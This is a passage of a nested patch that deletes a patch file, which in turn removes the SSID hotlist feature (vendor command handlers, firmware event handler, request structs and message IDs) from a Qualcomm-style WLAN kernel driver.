--	INIT_COMPLETION(context->response_event);
--	context->request_id = request_id = request->request_id;
--	spin_unlock(&hdd_context_lock);
--
--	status = sme_set_ssid_hotlist(hdd_ctx->hHal, request);
--	if (!HAL_STATUS_SUCCESS(status)) {
--		hddLog(LOGE,
--		       FL("sme_set_ssid_hotlist failed(err=%d)"), status);
--		goto fail;
--	}
--
--	vos_mem_free(request);
--
--	/* request was sent -- wait for the response */
--	rc = wait_for_completion_timeout(&context->response_event,
--					 msecs_to_jiffies
--						(WLAN_WAIT_TIME_EXTSCAN));
--	if (!rc) {
--		hddLog(LOGE, FL("sme_set_ssid_hotlist timed out"));
--		retval = -ETIMEDOUT;
--	} else {
--		spin_lock(&hdd_context_lock);
--		if (context->request_id == request_id)
--			retval = context->response_status;
--		else
--			retval = -EINVAL;
--		spin_unlock(&hdd_context_lock);
--	}
--
--	return retval;
--
--fail:
--	vos_mem_free(request);
--	return -EINVAL;
--}
--
--/*
-- * done with short names for the global vendor params
-- * used by wlan_hdd_cfg80211_extscan_set_ssid_hotlist()
-- */
--#undef PARAM_MAX
--#undef PARAM_REQUEST_ID
--#undef PARAMS_NUM_SSID
--#undef THRESHOLD_PARAM
--#undef PARAM_SSID
--#undef PARAM_BAND
--#undef PARAM_RSSI_LOW
--#undef PARAM_RSSI_HIGH
--
--/**
-- * wlan_hdd_cfg80211_extscan_set_ssid_hotlist() - set ssid hot list
-- * @wiphy: Pointer to wireless phy
-- * @wdev: Pointer to wireless device
-- * @data: Pointer to data
-- * @data_len: Data length
-- *
-- * Return: 0 on success, negative errno on failure
-- */
--static int
--wlan_hdd_cfg80211_extscan_set_ssid_hotlist(struct wiphy *wiphy,
--					   struct wireless_dev *wdev,
--					   const void *data,
--					   int data_len)
--{
--	int ret;
--
--	vos_ssr_protect(__func__);
--	ret = __wlan_hdd_cfg80211_extscan_set_ssid_hotlist(wiphy, wdev, data,
--							data_len);
--	vos_ssr_unprotect(__func__);
--
--	return ret;
--}
--
- static int __wlan_hdd_cfg80211_extscan_set_significant_change(
-                                         struct wiphy *wiphy,
-                                         struct wireless_dev *wdev,
-@@ -4632,136 +4369,6 @@ static int wlan_hdd_cfg80211_extscan_reset_bssid_hotlist(struct wiphy *wiphy,
- 	return ret;
- }
- 
--/**
-- * __wlan_hdd_cfg80211_extscan_reset_ssid_hotlist() - reset ssid hot list
-- * @wiphy: Pointer to wireless phy
-- * @wdev: Pointer to wireless device
-- * @data: Pointer to data
-- * @data_len: Data length
-- *
-- * Return: 0 on success, negative errno on failure
-- */
--static int
--__wlan_hdd_cfg80211_extscan_reset_ssid_hotlist(struct wiphy *wiphy,
--					     struct wireless_dev *wdev,
--					     const void *data,
--					     int data_len)
--{
--	struct sir_set_ssid_hotlist_request *request;
--	struct net_device *dev = wdev->netdev;
--	hdd_adapter_t *adapter = WLAN_HDD_GET_PRIV_PTR(dev);
--	hdd_context_t *hdd_ctx = wiphy_priv(wiphy);
--	struct nlattr *tb[PARAM_MAX + 1];
--	struct hdd_ext_scan_context *context;
--	uint32_t request_id;
--	eHalStatus status;
--	int retval;
--	unsigned long rc;
--
--	ENTER();
--
--	if (VOS_FTM_MODE == hdd_get_conparam()) {
--		hddLog(LOGE, FL("Command not allowed in FTM mode"));
--		return -EINVAL;
--	}
--
--	retval = wlan_hdd_validate_context(hdd_ctx);
--	if (0 != retval)
--		return -EINVAL;
--
--	if (!hdd_ctx->cfg_ini->extscan_enabled) {
--		hddLog(LOGE, FL("extscan not supported"));
--		return -ENOTSUPP;
--	}
--	if (nla_parse(tb, PARAM_MAX,
--		      data, data_len,
--		      wlan_hdd_extscan_config_policy)) {
--		hddLog(LOGE, FL("Invalid ATTR"));
--		return -EINVAL;
--	}
--
--	request = vos_mem_malloc(sizeof(*request));
--	if (!request) {
--		hddLog(LOGE, FL("vos_mem_malloc failed"));
--		return -ENOMEM;
--	}
--
--	/* Parse and fetch request Id */
--	if (!tb[PARAM_REQUEST_ID]) {
--		hddLog(LOGE, FL("attr request id failed"));
--		goto fail;
--	}
--
--	request->request_id = nla_get_u32(tb[PARAM_REQUEST_ID]);
--	request->session_id = adapter->sessionId;
--	hddLog(LOG1, FL("Request Id %d Session Id %d"), request->request_id,
--		request->session_id);
--
--	request->lost_ssid_sample_size = 0;
--	request->ssid_count = 0;
--
--	context = &hdd_ctx->ext_scan_context;
--	spin_lock(&hdd_context_lock);
--	INIT_COMPLETION(context->response_event);
--	context->request_id = request_id = request->request_id;
--	spin_unlock(&hdd_context_lock);
--
--	status = sme_set_ssid_hotlist(hdd_ctx->hHal, request);
--	if (!HAL_STATUS_SUCCESS(status)) {
--		hddLog(LOGE,
--		       FL("sme_reset_ssid_hotlist failed(err=%d)"), status);
--		goto fail;
--	}
--
--	vos_mem_free(request);
--
--	/* request was sent -- wait for the response */
--	rc = wait_for_completion_timeout(&context->response_event,
--					 msecs_to_jiffies
--						(WLAN_WAIT_TIME_EXTSCAN));
--	if (!rc) {
--		hddLog(LOGE, FL("sme_reset_ssid_hotlist timed out"));
--		retval = -ETIMEDOUT;
--	} else {
--		spin_lock(&hdd_context_lock);
--		if (context->request_id == request_id)
--			retval = context->response_status;
--		else
--			retval = -EINVAL;
--		spin_unlock(&hdd_context_lock);
--	}
--
--	return retval;
--
--fail:
--	vos_mem_free(request);
--	return -EINVAL;
--}
--
--/**
-- * wlan_hdd_cfg80211_extscan_reset_ssid_hotlist() - reset ssid hot list
-- * @wiphy: Pointer to wireless phy
-- * @wdev: Pointer to wireless device
-- * @data: Pointer to data
-- * @data_len: Data length
-- *
-- * Return: 0 on success, negative errno on failure
-- */
--static int
--wlan_hdd_cfg80211_extscan_reset_ssid_hotlist(struct wiphy *wiphy,
--					     struct wireless_dev *wdev,
--					     const void *data,
--					     int data_len)
--{
--	int ret;
--
--	vos_ssr_protect(__func__);
--	ret = __wlan_hdd_cfg80211_extscan_reset_ssid_hotlist(wiphy, wdev,
--							data, data_len);
--	vos_ssr_unprotect(__func__);
--
--	return ret;
--}
- /*
-  * done with short names for the global vendor params
-  * used by wlan_hdd_cfg80211_extscan_reset_ssid_hotlist()
-@@ -13572,22 +13179,6 @@ const struct wiphy_vendor_command hdd_wiphy_vendor_commands[] =
-                  WIPHY_VENDOR_CMD_NEED_RUNNING,
-         .doit = wlan_hdd_cfg80211_reset_passpoint_list
-     },
--    {
--        .info.vendor_id = QCA_NL80211_VENDOR_ID,
--        .info.subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST,
--        .flags = WIPHY_VENDOR_CMD_NEED_WDEV |
--                 WIPHY_VENDOR_CMD_NEED_NETDEV |
--                 WIPHY_VENDOR_CMD_NEED_RUNNING,
--        .doit = wlan_hdd_cfg80211_extscan_set_ssid_hotlist
--    },
--    {
--        .info.vendor_id = QCA_NL80211_VENDOR_ID,
--        .info.subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST,
--        .flags = WIPHY_VENDOR_CMD_NEED_WDEV |
--                 WIPHY_VENDOR_CMD_NEED_NETDEV |
--                 WIPHY_VENDOR_CMD_NEED_RUNNING,
--        .doit = wlan_hdd_cfg80211_extscan_reset_ssid_hotlist
--    },
- #endif /* FEATURE_WLAN_EXTSCAN */
-     {
-         .info.vendor_id = QCA_NL80211_VENDOR_ID,
-@@ -27596,152 +27187,6 @@ wlan_hdd_cfg80211_extscan_generic_rsp
- }
- 
- /**
-- * wlan_hdd_cfg80211_extscan_hotlist_ssid_match_ind() -
-- *	Handle an SSID hotlist match event
-- * @ctx: HDD context registered with SME
-- * @event: The SSID hotlist match event
-- *
-- * This function will take an SSID match event that was generated by
-- * firmware and will convert it into a cfg80211 vendor event which is
-- * sent to userspace.
-- * This callback execute in atomic context and must not invoke any
-- * blocking calls.
-- *
-- * Return: none
-- */
--static void
--wlan_hdd_cfg80211_extscan_hotlist_ssid_match_ind(void *ctx,
--						 tpSirWifiScanResultEvent event)
--{
--	hdd_context_t *hdd_ctx = ctx;
--	struct sk_buff *skb;
--	unsigned i;
--	unsigned index;
--	int flags = vos_get_gfp_flags();
--
--	ENTER();
--
--	if (wlan_hdd_validate_context(hdd_ctx))
--		return;
--
--	if (!event) {
--		hddLog(LOGE,
--			FL("event is null"));
--		return;
--	}
--	if (event->ap_found) {
--		index = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND_INDEX;
--		hddLog(LOG1, "SSID hotlist found");
--	} else {
--		index = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST_INDEX;
--		hddLog(LOG1, "SSID hotlist lost");
--	}
--
--	skb = cfg80211_vendor_event_alloc(hdd_ctx->wiphy,
--		NULL,
--		EXTSCAN_EVENT_BUF_SIZE + NLMSG_HDRLEN,
--		index, flags);
--
--	if (!skb) {
--		hddLog(LOGE, FL("cfg80211_vendor_event_alloc failed"));
--		return;
--	}
--	hddLog(LOG1, "Req Id %u, Num results %u, More Data (%u)",
--	       event->requestId, event->numOfAps, event->moreData);
--
--	for (i = 0; i < event->numOfAps; i++) {
--		hddLog(LOG1, "[i=%d] Timestamp %llu "
--		       "Ssid: %s "
--		       "Bssid (" MAC_ADDRESS_STR ") "
--		       "Channel %u "
--		       "Rssi %d "
--		       "RTT %u "
--		       "RTT_SD %u",
--		       i,
--		       event->ap[i].ts,
--		       event->ap[i].ssid,
--		       MAC_ADDR_ARRAY(event->ap[i].bssid),
--		       event->ap[i].channel,
--		       event->ap[i].rssi,
--		       event->ap[i].rtt,
--		       event->ap[i].rtt_sd);
--	}
--
--	if (nla_put_u32(skb,
--			QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_REQUEST_ID,
--			event->requestId) ||
--	    nla_put_u32(skb,
--			QCA_WLAN_VENDOR_ATTR_EXTSCAN_NUM_RESULTS_AVAILABLE,
--			event->numOfAps)) {
--		hddLog(LOGE, FL("put fail"));
--		goto fail;
--	}
--
--	if (event->numOfAps) {
--		struct nlattr *aps;
--		aps = nla_nest_start(skb,
--				     QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_LIST);
--		if (!aps) {
--			hddLog(LOGE, FL("nest fail"));
--			goto fail;
--		}
--
--		for (i = 0; i < event->numOfAps; i++) {
--			struct nlattr *ap;
--
--			ap = nla_nest_start(skb, i);
--			if (!ap) {
--				hddLog(LOGE, FL("nest fail"));
--				goto fail;
--			}
--
--			if (nla_put_u64(skb,
--					QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_TIME_STAMP,
--					event->ap[i].ts) ||
--			    nla_put(skb,
--				    QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_SSID,
--				    sizeof(event->ap[i].ssid),
--				    event->ap[i].ssid) ||
--			    nla_put(skb,
--				    QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_BSSID,
--				    sizeof(event->ap[i].bssid),
--				    event->ap[i].bssid) ||
--			    nla_put_u32(skb,
--					QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_CHANNEL,
--					event->ap[i].channel) ||
--			    nla_put_s32(skb,
--					QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_RSSI,
--					event->ap[i].rssi) ||
--			    nla_put_u32(skb,
--					QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_RTT,
--					event->ap[i].rtt) ||
--			    nla_put_u32(skb,
--					QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_RTT_SD,
--					event->ap[i].rtt_sd)) {
--				hddLog(LOGE, FL("put fail"));
--				goto fail;
--			}
--			nla_nest_end(skb, ap);
--		}
--		nla_nest_end(skb, aps);
--
--		if (nla_put_u8(skb,
--			       QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_MORE_DATA,
--			       event->moreData)) {
--			hddLog(LOGE, FL("put fail"));
--			goto fail;
--		}
--	}
--
--	cfg80211_vendor_event(skb, flags);
--	return;
--
--fail:
--	kfree_skb(skb);
--	return;
--}
--
--/**
-  * wlan_hdd_cfg80211_extscan_signif_wifi_change_results_ind() - results callback
-  * @hddctx: HDD context
-  * @data: event data
-@@ -28462,11 +27907,6 @@ void wlan_hdd_cfg80211_extscan_callback(void *ctx, const tANI_U16 evType,
- 	    wlan_hdd_cfg80211_extscan_generic_rsp(ctx, pMsg);
- 	    break;
- 
--    case eSIR_EXTSCAN_HOTLIST_SSID_MATCH_IND:
--            wlan_hdd_cfg80211_extscan_hotlist_ssid_match_ind(ctx,
--                                    (tpSirWifiScanResultEvent)pMsg);
--            break;
--
-     default:
-             hddLog(LOGE, FL("Unknown event type %u"), evType);
-             break;
-diff --git a/CORE/MAC/inc/sirApi.h b/CORE/MAC/inc/sirApi.h
-index 605e9c6..a2ac0b3 100644
---- a/CORE/MAC/inc/sirApi.h
-+++ b/CORE/MAC/inc/sirApi.h
-@@ -99,7 +99,6 @@ typedef tANI_U8 tSirVersionString[SIR_VERSION_STRING_LEN];
- #define WLAN_EXTSCAN_MAX_BUCKETS                  16
- #define WLAN_EXTSCAN_MAX_HOTLIST_APS              128
- #define WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS   64
--#define WLAN_EXTSCAN_MAX_HOTLIST_SSIDS            8
- 
- #define NUM_CHAINS_MAX  2
- 
-@@ -133,7 +132,6 @@ typedef enum
-     eSIR_PASSPOINT_NETWORK_FOUND_IND,
-     eSIR_EXTSCAN_SET_SSID_HOTLIST_RSP,
-     eSIR_EXTSCAN_RESET_SSID_HOTLIST_RSP,
--    eSIR_EXTSCAN_HOTLIST_SSID_MATCH_IND,
- 
-     /* Keep this last */
-     eSIR_EXTSCAN_CALLBACK_TYPE_MAX,
-@@ -5639,37 +5637,6 @@ typedef struct
- } tSirExtScanResetBssidHotlistReqParams,
-   *tpSirExtScanResetBssidHotlistReqParams;
- 
--/**
-- * struct sir_ssid_hotlist_param - param for SSID Hotlist
-- * @ssid: SSID which is being hotlisted
-- * @band: Band in which the given SSID should be scanned
-- * @rssi_low: Low bound on RSSI
-- * @rssi_high: High bound on RSSI
-- */
--struct sir_ssid_hotlist_param {
--	tSirMacSSid ssid;
--	uint8_t band;
--	int32_t rssi_low;
--	int32_t rssi_high;
--};
--
--/**
-- * struct sir_set_ssid_hotlist_request - set SSID hotlist request struct
-- * @request_id: ID of the request
-- * @session_id: ID of the session
-- * @lost_ssid_sample_size: Number of consecutive scans in which the SSID
-- *	must not be seen in order to consider the SSID "lost"
-- * @ssid_count: Number of valid entries in the @ssids array
-- * @ssids: Array that defines the SSIDs that are in the hotlist
-- */
--struct sir_set_ssid_hotlist_request {
--	uint32_t request_id;
--	uint8_t session_id;
--	uint32_t lost_ssid_sample_size;
--	uint32_t ssid_count;
--	struct sir_ssid_hotlist_param ssids[WLAN_EXTSCAN_MAX_HOTLIST_SSIDS];
--};
--
- typedef struct
- {
-     tANI_U32              requestId;
-diff --git a/CORE/MAC/src/include/sirParams.h b/CORE/MAC/src/include/sirParams.h
-index c6c8648..fbaad99 100644
---- a/CORE/MAC/src/include/sirParams.h
-+++ b/CORE/MAC/src/include/sirParams.h
-@@ -725,7 +725,7 @@ typedef struct sSirMbMsgP2p
- #define SIR_HAL_CONFIG_GUARD_TIME          (SIR_HAL_ITC_MSG_TYPES_BEGIN + 315)
- #define SIR_HAL_SET_PASSPOINT_LIST_REQ     (SIR_HAL_ITC_MSG_TYPES_BEGIN + 316)
- #define SIR_HAL_RESET_PASSPOINT_LIST_REQ   (SIR_HAL_ITC_MSG_TYPES_BEGIN + 317)
--#define SIR_HAL_EXTSCAN_SET_SSID_HOTLIST_REQ   (SIR_HAL_ITC_MSG_TYPES_BEGIN + 318)
-+/* 318 unused */
- 
- #define SIR_HAL_OCB_SET_CONFIG_CMD          (SIR_HAL_ITC_MSG_TYPES_BEGIN + 319)
- #define SIR_HAL_OCB_SET_UTC_TIME_CMD        (SIR_HAL_ITC_MSG_TYPES_BEGIN + 320)
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index 4acc943..df2ae90 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -4438,102 +4438,6 @@ static int wma_passpoint_match_event_handler(void *handle,
- 	return 0;
- }
- 
--/**
-- * wma_extscan_hotlist_ssid_match_event_handler() -
-- *	Handler for SSID hotlist match event from firmware
-- * @handle: WMA handle
-- * @cmd_param_info: WMI command buffer
-- * @len: length of @cmd_param_info
-- *
-- * Return: 0 on success, non-zero on failure
-- */
--static int
--wma_extscan_hotlist_ssid_match_event_handler(void *handle,
--					     uint8_t *cmd_param_info,
--					     uint32_t len)
--{
--	tp_wma_handle wma = (tp_wma_handle) handle;
--	WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID_param_tlvs *param_buf;
--	wmi_extscan_hotlist_ssid_match_event_fixed_param  *event;
--	tSirWifiScanResultEvent  *dest_hotlist;
--	tSirWifiScanResult      *dest_ap;
--	wmi_extscan_wlan_descriptor    *src_hotlist;
--	int numap, j;
--	bool ssid_found = false;
--	tpAniSirGlobal mac =
--		vos_get_context(VOS_MODULE_ID_PE, wma->vos_context);
--
--	if (!mac) {
--		WMA_LOGE("%s: Invalid mac", __func__);
--		return -EINVAL;
--	}
--
--	if (!mac->sme.pExtScanIndCb) {
--		WMA_LOGE("%s: Callback not registered", __func__);
--		return -EINVAL;
--	}
--
--	param_buf = (WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID_param_tlvs *)
--					cmd_param_info;
--	if (!param_buf) {
--		WMA_LOGE("%s: Invalid hotlist match event", __func__);
--		return -EINVAL;
--	}
--
--	event = param_buf->fixed_param;
--	src_hotlist = param_buf->hotlist_ssid_match;
--	numap = event->total_entries;
--	if (!src_hotlist || !numap) {
--		WMA_LOGE("%s: Hotlist AP's list invalid", __func__);
--		return -EINVAL;
--	}
--
--	dest_hotlist = vos_mem_malloc(sizeof(*dest_hotlist) +
--					sizeof(*dest_ap) * numap);
--	if (!dest_hotlist) {
--		WMA_LOGE("%s: Allocation failed for hotlist buffer", __func__);
--		return -EINVAL;
--	}
--
--	dest_ap = &dest_hotlist->ap[0];
--	dest_hotlist->numOfAps = event->total_entries;
--	dest_hotlist->requestId = event->config_request_id;
--
--	if (event->first_entry_index +
--		event->num_entries_in_page < event->total_entries)
--		dest_hotlist->moreData = 1;
--	else
--		dest_hotlist->moreData = 0;
--
--	WMA_LOGD("%s: Hotlist match: requestId: %u, numOfAps: %d", __func__,
--		 dest_hotlist->requestId, dest_hotlist->numOfAps);
--
--	for (j = 0; j < numap; j++) {
--		dest_ap->channel = src_hotlist->channel;
--		dest_ap->ts = src_hotlist->tstamp;
--		ssid_found = src_hotlist->flags & WMI_HOTLIST_FLAG_PRESENCE;
--		dest_ap->rtt = src_hotlist->rtt;
--		dest_ap->rtt_sd = src_hotlist->rtt_sd;
--		dest_ap->beaconPeriod = src_hotlist->beacon_interval;
--		dest_ap->capability = src_hotlist->capabilities;
--		dest_ap->ieLength = src_hotlist-> ie_length;
--		WMI_MAC_ADDR_TO_CHAR_ARRAY(&src_hotlist->bssid,
--						dest_ap->bssid);
--		vos_mem_copy(dest_ap->ssid, src_hotlist->ssid.ssid,
--					src_hotlist->ssid.ssid_len);
--		dest_ap->ssid[src_hotlist->ssid.ssid_len] = '\0';
--		dest_ap++;
--		src_hotlist++;
--	}
--
--	dest_hotlist->ap_found = ssid_found;
--	mac->sme.pExtScanIndCb(mac->hHdd,
--			       eSIR_EXTSCAN_HOTLIST_SSID_MATCH_IND,
--			       dest_hotlist);
--	WMA_LOGD("%s: sending hotlist ssid match event", __func__);
--	vos_mem_free(dest_hotlist);
--	return 0;
--}
- #endif
- 
- #ifdef WLAN_FEATURE_LINK_LAYER_STATS
-@@ -8079,10 +7983,6 @@ wma_register_extscan_event_handler(tp_wma_handle wma_handle)
- 			WMI_PASSPOINT_MATCH_EVENTID,
- 			wma_passpoint_match_event_handler);
- 
--	wmi_unified_register_event_handler(wma_handle->wmi_handle,
--			WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID,
--			wma_extscan_hotlist_ssid_match_event_handler);
--
- 	return;
- 
- }
-@@ -21915,10 +21815,6 @@ static int wma_extscan_get_eventid_from_tlvtag(uint32_t tag)
- 		event_id = WMI_EXTSCAN_CAPABILITIES_EVENTID;
- 		break;
- 
--	case WMITLV_TAG_STRUC_wmi_extscan_hotlist_ssid_match_event_fixed_param:
--		event_id = WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID;
--		break;
--
- 	default:
- 		event_id = 0;
- 		WMA_LOGE("%s: Unknown tag: %d", __func__, tag);
-@@ -22003,11 +21899,6 @@ static void wma_extscan_wow_event_callback(void *handle, void *event,
- 				wmi_cmd_struct_ptr, len);
- 		break;
- 
--	case WMITLV_TAG_STRUC_wmi_extscan_hotlist_ssid_match_event_fixed_param:
--		wma_extscan_hotlist_ssid_match_event_handler(handle,
--				wmi_cmd_struct_ptr, len);
--		break;
--
- 	default:
- 		WMA_LOGE("%s: Unknown tag: %d", __func__, tag);
- 		break;
-@@ -28903,111 +28794,6 @@ VOS_STATUS wma_extscan_stop_hotlist_monitor(tp_wma_handle wma,
- 	return VOS_STATUS_SUCCESS;
- }
- 
--/**
-- * wma_set_ssid_hotlist() - Handle an SSID hotlist set request
-- * @wma: WMA handle
-- * @request: SSID hotlist set request from SME
-- *
-- * Return: VOS_STATUS
-- */
--static VOS_STATUS
--wma_set_ssid_hotlist(tp_wma_handle wma,
--		     struct sir_set_ssid_hotlist_request *request)
--{
--	wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param *cmd;
--	wmi_buf_t wmi_buf;
--	uint32_t len;
--	uint32_t array_size;
--	uint8_t *buf_ptr;
--
--	if (!wma || !wma->wmi_handle) {
--		WMA_LOGE("%s: WMA is closed, can not issue hotlist cmd",
--			 __func__);
--		return VOS_STATUS_E_INVAL;
--	}
--	if (!request) {
--		WMA_LOGE("%s: Invalid request buffer",
--			__func__);
--		return VOS_STATUS_E_INVAL;
--	}
--	if (!WMI_SERVICE_IS_ENABLED(wma->wmi_service_bitmap,
--				    WMI_SERVICE_EXTSCAN)) {
--		WMA_LOGE("%s: extscan not enabled",
--			__func__);
--		return VOS_STATUS_E_FAILURE;
--	}
--
--	/* length of fixed portion */
--	len = sizeof(*cmd);
--
--	/* length of variable portion */
--	array_size =
--		request->ssid_count * sizeof(wmi_extscan_hotlist_ssid_entry);
--	len += WMI_TLV_HDR_SIZE + array_size;
--
--	wmi_buf = wmi_buf_alloc(wma->wmi_handle, len);
--	if (!wmi_buf) {
--		WMA_LOGE("%s: wmi_buf_alloc failed", __func__);
--		return VOS_STATUS_E_NOMEM;
--	}
--
--	buf_ptr = (uint8_t *) wmi_buf_data(wmi_buf);
--	cmd = (wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param *)
--						buf_ptr;
--	WMITLV_SET_HDR
--		(&cmd->tlv_header,
--		 WMITLV_TAG_STRUC_wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param,
--		 WMITLV_GET_STRUCT_TLVLEN
--			(wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param));
--
--	cmd->request_id = request->request_id;
--	cmd->requestor_id = 0;
--	cmd->vdev_id = request->session_id;
--	cmd->table_id = 0;
--	cmd->lost_ap_scan_count = request->lost_ssid_sample_size;
--	cmd->total_entries = request->ssid_count;
--	cmd->num_entries_in_page = request->ssid_count;
--	cmd->first_entry_index = 0;
--
--	buf_ptr += sizeof(*cmd);
--	WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC, array_size);
--
--	if (request->ssid_count) {
--		wmi_extscan_hotlist_ssid_entry *entry;
--		int i;
--
--		buf_ptr += WMI_TLV_HDR_SIZE;
--		entry = (wmi_extscan_hotlist_ssid_entry *)buf_ptr;
--		for (i = 0; i < request->ssid_count; i++) {
--			WMITLV_SET_HDR
--				(entry,
--				 WMITLV_TAG_ARRAY_STRUC,
--				 WMITLV_GET_STRUCT_TLVLEN
--					(wmi_extscan_hotlist_ssid_entry));
--			entry->ssid.ssid_len = request->ssids[i].ssid.length;
--			vos_mem_copy(entry->ssid.ssid,
--				     request->ssids[i].ssid.ssId,
--				     request->ssids[i].ssid.length);
--			entry->band = request->ssids[i].band;
--			entry->min_rssi = request->ssids[i].rssi_low;
--			entry->max_rssi = request->ssids[i].rssi_high;
--			entry++;
--		}
--		cmd->mode = WMI_EXTSCAN_MODE_START;
--	} else {
--		cmd->mode = WMI_EXTSCAN_MODE_STOP;
--	}
--
--	if (wmi_unified_cmd_send
--		(wma->wmi_handle, wmi_buf, len,
--		 WMI_EXTSCAN_CONFIGURE_HOTLIST_SSID_MONITOR_CMDID)) {
--		WMA_LOGE("%s: failed to send command", __func__);
--		wmi_buf_free(wmi_buf);
--		return VOS_STATUS_E_FAILURE;
--	}
--	return VOS_STATUS_SUCCESS;
--}
--
- VOS_STATUS wma_get_buf_extscan_change_monitor_cmd(tp_wma_handle wma_handle,
- 			tSirExtScanSetSigChangeReqParams *psigchange,
- 			wmi_buf_t *buf, int *buf_len)
-@@ -32598,11 +32384,6 @@ VOS_STATUS wma_mc_process_msg(v_VOID_t *vos_context, vos_msg_t *msg)
- 			(tSirExtScanResetBssidHotlistReqParams *)msg->bodyptr);
- 			vos_mem_free(msg->bodyptr);
- 			break;
--		case WDA_EXTSCAN_SET_SSID_HOTLIST_REQ:
--			wma_set_ssid_hotlist(wma_handle,
--				(struct sir_set_ssid_hotlist_request *)msg->bodyptr);
--			vos_mem_free(msg->bodyptr);
--			break;
- 		case WDA_EXTSCAN_SET_SIGNF_CHANGE_REQ:
- 			wma_extscan_start_change_monitor(wma_handle,
- 				(tSirExtScanSetSigChangeReqParams *)msg->bodyptr);
-diff --git a/CORE/SME/inc/sme_Api.h b/CORE/SME/inc/sme_Api.h
-index 3a08cb5..0834e5b 100644
---- a/CORE/SME/inc/sme_Api.h
-+++ b/CORE/SME/inc/sme_Api.h
-@@ -4137,10 +4137,6 @@ eHalStatus sme_SetBssHotlist (tHalHandle hHal,
- eHalStatus sme_ResetBssHotlist (tHalHandle hHal,
-                              tSirExtScanResetBssidHotlistReqParams *pResetReq);
- 
--eHalStatus
--sme_set_ssid_hotlist(tHalHandle hal,
--		     struct sir_set_ssid_hotlist_request *request);
--
- /* ---------------------------------------------------------------------------
-     \fn sme_SetSignificantChange
-     \brief  SME API to set significant change
-diff --git a/CORE/SME/src/sme_common/sme_Api.c b/CORE/SME/src/sme_common/sme_Api.c
-index 4db2b3f..cb1a588 100644
---- a/CORE/SME/src/sme_common/sme_Api.c
-+++ b/CORE/SME/src/sme_common/sme_Api.c
-@@ -15966,52 +15966,6 @@ eHalStatus sme_ResetBssHotlist (tHalHandle hHal,
-     return status;
- }
- 
--/**
-- * sme_set_ssid_hotlist() - Set the SSID hotlist
-- * @hal: SME handle
-- * @request: set ssid hotlist request
-- *
-- * Return: eHalStatus
-- */
--eHalStatus
--sme_set_ssid_hotlist(tHalHandle hal,
--		     struct sir_set_ssid_hotlist_request *request)
--{
--	eHalStatus status;
--	VOS_STATUS vstatus;
--	tpAniSirGlobal mac = PMAC_STRUCT(hal);
--	vos_msg_t vos_message;
--	struct sir_set_ssid_hotlist_request *set_req;
--
--	set_req = vos_mem_malloc(sizeof(*set_req));
--	if (!set_req) {
--		VOS_TRACE(VOS_MODULE_ID_SME, VOS_TRACE_LEVEL_ERROR,
--			  "%s: Not able to allocate memory for WDA_EXTSCAN_SET_SSID_HOTLIST_REQ",
--			  __func__);
--		return eHAL_STATUS_FAILURE;
--	}
--
--	*set_req = *request;
--	status = sme_AcquireGlobalLock(&mac->sme);
--	if (eHAL_STATUS_SUCCESS == status) {
--		/* Serialize the req through MC thread */
--		vos_message.bodyptr = set_req;
--		vos_message.type    = WDA_EXTSCAN_SET_SSID_HOTLIST_REQ;
--		vstatus = vos_mq_post_message(VOS_MQ_ID_WDA, &vos_message);
--		sme_ReleaseGlobalLock(&mac->sme);
--		if (!VOS_IS_STATUS_SUCCESS(vstatus)) {
--			vos_mem_free(set_req);
--			status = eHAL_STATUS_FAILURE;
--		}
--	} else {
--		VOS_TRACE(VOS_MODULE_ID_SME, VOS_TRACE_LEVEL_ERROR,
--			  "%s: sme_AcquireGlobalLock error", __func__);
--		vos_mem_free(set_req);
--		status = eHAL_STATUS_FAILURE;
--	}
--	return status;
--}
--
- /* ---------------------------------------------------------------------------
-     \fn sme_SetSignificantChange
-     \brief  SME API to set significant change
-diff --git a/CORE/SYS/legacy/src/utils/src/macTrace.c b/CORE/SYS/legacy/src/utils/src/macTrace.c
-index 8a27363..110376f 100644
---- a/CORE/SYS/legacy/src/utils/src/macTrace.c
-+++ b/CORE/SYS/legacy/src/utils/src/macTrace.c
-@@ -952,7 +952,6 @@ tANI_U8* macTraceGetWdaMsgString(tANI_U16 wdaMsg)
- 	CASE_RETURN_STRING(WDA_EXTSCAN_STOP_REQ);
- 	CASE_RETURN_STRING(WDA_EXTSCAN_SET_BSSID_HOTLIST_REQ);
- 	CASE_RETURN_STRING(WDA_EXTSCAN_RESET_BSSID_HOTLIST_REQ);
--	CASE_RETURN_STRING(WDA_EXTSCAN_SET_SSID_HOTLIST_REQ);
- 	CASE_RETURN_STRING(WDA_EXTSCAN_SET_SIGNF_CHANGE_REQ);
- 	CASE_RETURN_STRING(WDA_EXTSCAN_RESET_SIGNF_CHANGE_REQ);
